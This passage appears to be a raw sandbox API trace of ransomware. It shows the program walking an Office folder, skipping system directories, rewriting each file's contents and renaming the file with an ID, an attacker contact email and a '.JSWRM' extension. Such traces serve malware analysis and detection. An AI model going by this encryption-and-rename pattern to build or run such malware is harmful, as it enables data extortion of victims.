lpOverlapped=0x0 | out: lpBuffer=0x22e358*, lpNumberOfBytesRead=0x345e89c*=0xd0, lpOverlapped=0x0) returned 1 [0121.277] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.277] WriteFile (in: hFile=0x238, lpBuffer=0x22e358*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22e358*, lpNumberOfBytesWritten=0x345e898*=0xd0, lpOverlapped=0x0) returned 1 [0121.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0121.277] CloseHandle (hObject=0x238) returned 1 [0121.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0121.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0121.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0121.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0121.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0121.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0121.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.277] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0121.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0121.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0121.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0121.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0121.278] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_BASIC_F_COL.HXK", cAlternateFileName="SKYPEF~2.HXK")) returned 1 [0121.278] lstrcmpiW (lpString1="SKYPEFB_BASIC_F_COL.HXK", lpString2=".") returned 1 [0121.278] lstrcmpiW (lpString1="SKYPEFB_BASIC_F_COL.HXK", lpString2="..") returned 1 [0121.278] lstrcmpiW (lpString1="SKYPEFB_BASIC_F_COL.HXK", lpString2="...") returned 1 [0121.278] lstrcmpiW (lpString1="SKYPEFB_BASIC_F_COL.HXK", lpString2="windows") returned -1 [0121.278] lstrcmpiW (lpString1="SKYPEFB_BASIC_F_COL.HXK", lpString2="recovery") returned 1 [0121.278] lstrcmpiW (lpString1="SKYPEFB_BASIC_F_COL.HXK", lpString2="perflogs") returned 1 [0121.278] lstrcmpiW (lpString1="SKYPEFB_BASIC_F_COL.HXK", lpString2="documents and settings") returned 1 [0121.278] lstrcmpiW (lpString1="SKYPEFB_BASIC_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0121.279] lstrcmpiW (lpString1="SKYPEFB_BASIC_F_COL.HXK", lpString2="system volume information") returned -1 [0121.279] lstrcmpiW (lpString1="SKYPEFB_BASIC_F_COL.HXK", lpString2="msocache") returned 1 [0121.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_F_COL.HXK", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0121.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0121.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_F_COL.HXK", cchWideChar=23, lpMultiByteStr=0x2413d0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_BASIC_F_COL.HXK", lpUsedDefaultChar=0x0) returned 23 [0121.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_F_COL.HXK", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0121.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0121.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_F_COL.HXK", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_BASIC_F_COL.HXK", lpUsedDefaultChar=0x0) returned 23 [0121.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0121.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0121.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0121.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.280] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0121.280] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0121.280] ReadFile (in: hFile=0x238, lpBuffer=0x209800, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209800*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0121.282] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.283] WriteFile (in: hFile=0x238, lpBuffer=0x209800*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209800*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0121.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0121.283] CloseHandle (hObject=0x238) returned 1 [0121.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0121.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0121.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0121.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0121.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0121.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0121.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.283] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0121.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0121.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0121.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0121.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0121.284] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_BASIC_K_COL.HXK", cAlternateFileName="SKYPEF~3.HXK")) returned 1 [0121.284] lstrcmpiW (lpString1="SKYPEFB_BASIC_K_COL.HXK", lpString2=".") returned 1 [0121.284] lstrcmpiW (lpString1="SKYPEFB_BASIC_K_COL.HXK", lpString2="..") returned 1 [0121.284] lstrcmpiW (lpString1="SKYPEFB_BASIC_K_COL.HXK", lpString2="...") returned 1 [0121.285] lstrcmpiW (lpString1="SKYPEFB_BASIC_K_COL.HXK", lpString2="windows") returned -1 [0121.285] lstrcmpiW (lpString1="SKYPEFB_BASIC_K_COL.HXK", lpString2="recovery") returned 1 [0121.285] lstrcmpiW (lpString1="SKYPEFB_BASIC_K_COL.HXK", lpString2="perflogs") returned 1 [0121.285] lstrcmpiW (lpString1="SKYPEFB_BASIC_K_COL.HXK", lpString2="documents and settings") returned 1 [0121.285] lstrcmpiW (lpString1="SKYPEFB_BASIC_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0121.285] lstrcmpiW (lpString1="SKYPEFB_BASIC_K_COL.HXK", lpString2="system volume information") returned -1 [0121.285] lstrcmpiW (lpString1="SKYPEFB_BASIC_K_COL.HXK", lpString2="msocache") returned 1 [0121.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_K_COL.HXK", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0121.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0121.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_K_COL.HXK", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_BASIC_K_COL.HXK", lpUsedDefaultChar=0x0) returned 23 [0121.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_K_COL.HXK", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0121.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0121.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_K_COL.HXK", cchWideChar=23, lpMultiByteStr=0x241268, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_BASIC_K_COL.HXK", lpUsedDefaultChar=0x0) returned 23 [0121.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0121.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0121.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0121.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.286] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0121.286] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0121.286] ReadFile (in: hFile=0x238, lpBuffer=0x2093c8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2093c8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0121.287] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.287] WriteFile (in: hFile=0x238, lpBuffer=0x2093c8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2093c8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0121.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0121.287] CloseHandle (hObject=0x238) returned 1 [0121.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0121.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0121.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0121.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0121.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0121.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0121.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0121.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0121.288] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0121.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0121.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0121.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0121.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0121.288] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x277, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_COL.HXC", cAlternateFileName="SKYPEF~1.HXC")) returned 1 [0121.288] lstrcmpiW (lpString1="SKYPEFB_COL.HXC", lpString2=".") returned 1 [0121.288] lstrcmpiW (lpString1="SKYPEFB_COL.HXC", lpString2="..") returned 1 [0121.288] lstrcmpiW (lpString1="SKYPEFB_COL.HXC", lpString2="...") returned 1 [0121.289] lstrcmpiW (lpString1="SKYPEFB_COL.HXC", lpString2="windows") returned -1 [0121.289] lstrcmpiW (lpString1="SKYPEFB_COL.HXC", lpString2="recovery") returned 1 [0121.289] lstrcmpiW (lpString1="SKYPEFB_COL.HXC", lpString2="perflogs") returned 1 [0121.289] lstrcmpiW (lpString1="SKYPEFB_COL.HXC", lpString2="documents and settings") returned 1 [0121.289] lstrcmpiW (lpString1="SKYPEFB_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0121.289] lstrcmpiW (lpString1="SKYPEFB_COL.HXC", lpString2="system volume information") returned -1 [0121.289] lstrcmpiW (lpString1="SKYPEFB_COL.HXC", lpString2="msocache") returned 1 [0121.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0121.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_COL.HXC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_COL.HXC", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_COL.HXC", lpUsedDefaultChar=0x0) returned 15 [0121.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0121.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0121.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_COL.HXC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_COL.HXC", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_COL.HXC", lpUsedDefaultChar=0x0) returned 15 [0121.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0121.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0121.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0121.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0121.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.290] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=631) returned 1 [0121.290] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x270) returned 0x20b1f8 [0121.290] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: 